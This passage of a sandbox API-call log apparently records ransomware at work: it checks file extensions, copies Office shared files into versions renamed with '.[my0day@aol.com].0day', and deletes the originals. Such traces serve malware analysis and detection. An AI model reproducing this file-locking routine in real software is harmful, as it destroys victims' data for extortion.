lstrlenW (lpString=".pdf") returned 4 [0049.967] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0049.967] lstrlenW (lpString=".xls") returned 4 [0049.967] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0049.967] lstrlenW (lpString=".xlsx") returned 5 [0049.967] lstrcmpiW (lpString1=".xlsx", lpString2="X.dll") returned -1 [0049.967] lstrlenW (lpString=".ppt") returned 4 [0049.967] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0049.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.967] lstrlenW (lpString=".zip") returned 4 [0049.967] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0049.967] lstrlenW (lpString=".rar") returned 4 [0049.967] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0049.967] lstrlenW (lpString=".bz2") returned 4 [0049.967] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0049.967] lstrlenW (lpString=".7z") returned 3 [0049.967] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0049.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.967] lstrlenW (lpString=".dbf") returned 4 [0049.967] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0049.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.967] lstrlenW (lpString=".1cd") returned 4 [0049.967] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0049.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 74 [0049.967] lstrlenW (lpString=".jpg") returned 4 [0049.967] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0049.968] lstrcmpiW (lpString1=".sys", lpString2=".0day") returned 1 [0049.968] lstrlenW (lpString="pagefile.sys") returned 12 [0049.968] CreateFileW (lpFileName="C:\\pagefile.sys" (normalized: "c:\\pagefile.sys"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.968] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.968] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.968] lstrlenW (lpString=".doc") returned 4 [0049.968] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0049.968] lstrlenW (lpString=".docx") returned 5 [0049.968] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0049.968] lstrlenW (lpString=".pdf") returned 4 [0049.968] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0049.968] lstrlenW (lpString=".xls") returned 4 [0049.968] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0049.968] lstrlenW (lpString=".xlsx") returned 5 [0049.968] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0049.968] lstrlenW (lpString=".ppt") returned 4 [0049.968] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0049.968] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.968] lstrlenW (lpString=".zip") returned 4 [0049.968] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0049.968] lstrlenW (lpString=".rar") returned 4 [0049.968] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0049.968] lstrlenW (lpString=".bz2") returned 4 [0049.968] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0049.968] lstrlenW (lpString=".7z") returned 3 [0049.968] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0049.968] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.968] lstrlenW (lpString=".dbf") returned 4 [0049.968] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0049.968] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.968] lstrlenW (lpString=".1cd") returned 4 [0049.968] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0049.969] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.969] lstrlenW (lpString=".jpg") returned 4 [0049.969] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0049.969] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.969] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.969] lstrlenW (lpString=".doc") returned 4 [0049.969] lstrcmpiW (lpString1=".doc", lpString2=".sys") returned -1 [0049.969] lstrlenW (lpString=".docx") returned 5 [0049.969] lstrcmpiW (lpString1=".docx", lpString2="e.sys") returned -1 [0049.969] lstrlenW (lpString=".pdf") returned 4 [0049.969] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0049.969] lstrlenW (lpString=".xls") returned 4 [0049.969] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0049.969] lstrlenW (lpString=".xlsx") returned 5 [0049.969] lstrcmpiW (lpString1=".xlsx", lpString2="e.sys") returned -1 [0049.969] lstrlenW (lpString=".ppt") returned 4 [0049.969] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0049.969] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.969] lstrlenW (lpString=".zip") returned 4 [0049.969] lstrcmpiW (lpString1=".zip", lpString2=".sys") returned 1 [0049.969] lstrlenW (lpString=".rar") returned 4 [0049.969] lstrcmpiW (lpString1=".rar", lpString2=".sys") returned -1 [0049.969] lstrlenW (lpString=".bz2") returned 4 [0049.969] lstrcmpiW (lpString1=".bz2", lpString2=".sys") returned -1 [0049.969] lstrlenW (lpString=".7z") returned 3 [0049.969] lstrcmpiW (lpString1=".7z", lpString2="sys") returned -1 [0049.969] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.969] lstrlenW (lpString=".dbf") returned 4 [0049.969] lstrcmpiW (lpString1=".dbf", lpString2=".sys") returned -1 [0049.969] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.969] lstrlenW (lpString=".1cd") returned 4 [0049.969] lstrcmpiW (lpString1=".1cd", lpString2=".sys") returned -1 [0049.969] lstrlenW (lpString="C:\\pagefile.sys") returned 15 [0049.970] lstrlenW (lpString=".jpg") returned 4 [0049.970] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0049.970] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0049.970] lstrlenW (lpString="MSADDNDR.DLL") returned 12 [0049.970] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0050.110] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=99136) returned 1 [0050.110] CloseHandle (hObject=0x198) returned 1 [0050.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 0x20 [0050.110] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0050.110] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.110] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.110] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0050.110] GetLastError () returned 0x0 [0050.110] ReadFile (in: hFile=0x198, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x18340, lpOverlapped=0x0) returned 1 [0050.113] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x18350, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x18350, lpOverlapped=0x0) returned 1 [0050.115] ReadFile (in: hFile=0x198, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.115] WriteFile (in: hFile=0x1d8, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.115] SetEndOfFile (hFile=0x1d8) returned 1 [0050.116] CloseHandle (hObject=0x1d8) returned 1 [0050.116] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.116] SetEndOfFile (hFile=0x198) returned 1 [0050.117] CloseHandle (hObject=0x198) returned 1 [0050.117] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0050.117] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL" (normalized: "c:\\program files\\common files\\designer\\msaddndr.dll")) returned 1 [0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.118] lstrlenW (lpString=".doc") returned 4 [0050.118] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.118] lstrlenW (lpString=".docx") returned 5 [0050.118] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0050.118] lstrlenW (lpString=".pdf") returned 4 [0050.118] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.118] lstrlenW (lpString=".xls") returned 4 [0050.118] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.118] lstrlenW (lpString=".xlsx") returned 5 [0050.118] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0050.118] lstrlenW (lpString=".ppt") returned 4 [0050.118] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.118] lstrlenW (lpString=".zip") returned 4 [0050.118] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.118] lstrlenW (lpString=".rar") returned 4 [0050.118] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.118] lstrlenW (lpString=".bz2") returned 4 [0050.118] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.118] lstrlenW (lpString=".7z") returned 3 [0050.118] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.118] lstrlenW (lpString=".dbf") returned 4 [0050.118] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.118] lstrlenW (lpString=".1cd") returned 4 [0050.118] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.118] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.118] lstrlenW (lpString=".jpg") returned 4 [0050.118] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.119] lstrlenW (lpString=".doc") returned 4 [0050.119] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0050.119] lstrlenW (lpString=".docx") returned 5 [0050.119] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0050.119] lstrlenW (lpString=".pdf") returned 4 [0050.119] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0050.119] lstrlenW (lpString=".xls") returned 4 [0050.119] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0050.119] lstrlenW (lpString=".xlsx") returned 5 [0050.119] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0050.119] lstrlenW (lpString=".ppt") returned 4 [0050.119] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0050.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.119] lstrlenW (lpString=".zip") returned 4 [0050.119] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0050.119] lstrlenW (lpString=".rar") returned 4 [0050.119] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0050.119] lstrlenW (lpString=".bz2") returned 4 [0050.119] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0050.119] lstrlenW (lpString=".7z") returned 3 [0050.119] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0050.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.119] lstrlenW (lpString=".dbf") returned 4 [0050.119] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0050.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.119] lstrlenW (lpString=".1cd") returned 4 [0050.119] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0050.119] lstrlenW (lpString="C:\\Program Files\\Common Files\\DESIGNER\\MSADDNDR.DLL") returned 51 [0050.119] lstrlenW (lpString=".jpg") returned 4 [0050.119] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0050.120] lstrcmpiW (lpString1=".EXE", lpString2=".0day") returned 1 [0050.120] lstrlenW (lpString="DWTRIG20.EXE") returned 12 [0050.120] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0050.387] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=629664) returned 1 [0050.387] CloseHandle (hObject=0x188) returned 1 [0050.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 0x20 [0050.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0050.387] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0050.387] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.387] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.387] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0051.909] GetLastError () returned 0x0 [0051.909] ReadFile (in: hFile=0x188, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x99ba0, lpOverlapped=0x0) returned 1 [0051.922] WriteFile (in: hFile=0x17c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0x99bb0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0x99bb0, lpOverlapped=0x0) returned 1 [0051.932] ReadFile (in: hFile=0x188, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.932] WriteFile (in: hFile=0x17c, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.932] SetEndOfFile (hFile=0x17c) returned 1 [0051.932] CloseHandle (hObject=0x17c) returned 1 [0051.933] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.933] SetEndOfFile (hFile=0x188) returned 1 [0051.937] CloseHandle (hObject=0x188) returned 1 [0051.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0051.938] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dwtrig20.exe")) returned 1 [0051.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.938] lstrlenW (lpString=".doc") returned 4 [0051.938] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.938] lstrlenW (lpString=".docx") returned 5 [0051.938] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.938] lstrlenW (lpString=".pdf") returned 4 [0051.938] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.938] lstrlenW (lpString=".xls") returned 4 [0051.938] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.938] lstrlenW (lpString=".xlsx") returned 5 [0051.938] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.938] lstrlenW (lpString=".ppt") returned 4 [0051.938] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.938] lstrlenW (lpString=".zip") returned 4 [0051.938] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.938] lstrlenW (lpString=".rar") returned 4 [0051.938] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.938] lstrlenW (lpString=".bz2") returned 4 [0051.938] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.938] lstrlenW (lpString=".7z") returned 3 [0051.938] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.938] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.939] lstrlenW (lpString=".dbf") returned 4 [0051.939] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.939] lstrlenW (lpString=".1cd") returned 4 [0051.939] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.939] lstrlenW (lpString=".jpg") returned 4 [0051.939] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.939] lstrlenW (lpString=".doc") returned 4 [0051.939] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1 [0051.939] lstrlenW (lpString=".docx") returned 5 [0051.939] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1 [0051.939] lstrlenW (lpString=".pdf") returned 4 [0051.939] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1 [0051.939] lstrlenW (lpString=".xls") returned 4 [0051.939] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1 [0051.939] lstrlenW (lpString=".xlsx") returned 5 [0051.939] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1 [0051.939] lstrlenW (lpString=".ppt") returned 4 [0051.939] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1 [0051.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.939] lstrlenW (lpString=".zip") returned 4 [0051.939] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1 [0051.939] lstrlenW (lpString=".rar") returned 4 [0051.939] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1 [0051.939] lstrlenW (lpString=".bz2") returned 4 [0051.939] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1 [0051.939] lstrlenW (lpString=".7z") returned 3 [0051.939] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1 [0051.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.939] lstrlenW (lpString=".dbf") returned 4 [0051.940] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1 [0051.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.940] lstrlenW (lpString=".1cd") returned 4 [0051.940] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1 [0051.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DWTRIG20.EXE") returned 62 [0051.940] lstrlenW (lpString=".jpg") returned 4 [0051.940] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1 [0051.940] lstrcmpiW (lpString1=".FLT", lpString2=".0day") returned 1 [0051.940] lstrlenW (lpString="EPSIMP32.FLT") returned 12 [0051.940] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0053.544] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x370ff1c | out: lpFileSize=0x370ff1c*=712592) returned 1 [0053.544] CloseHandle (hObject=0x190) returned 1 [0053.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 0x20 [0053.544] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0053.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0053.603] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.603] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0053.963] GetLastError () returned 0x0 [0053.963] ReadFile (in: hFile=0x1d8, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0xadf90, lpOverlapped=0x0) returned 1 [0053.979] WriteFile (in: hFile=0x248, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xadfa0, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xadfa0, lpOverlapped=0x0) returned 1 [0053.992] ReadFile (in: hFile=0x1d8, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x370fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesRead=0x370fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.992] WriteFile (in: hFile=0x248, lpBuffer=0x3d90020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x370fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d90020*, lpNumberOfBytesWritten=0x370fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.992] SetEndOfFile (hFile=0x248) returned 1 [0053.992] CloseHandle (hObject=0x248) returned 1 [0053.993] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x370fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.993] SetEndOfFile (hFile=0x1d8) returned 1 [0053.998] CloseHandle (hObject=0x1d8) returned 1 [0053.998] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.998] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program 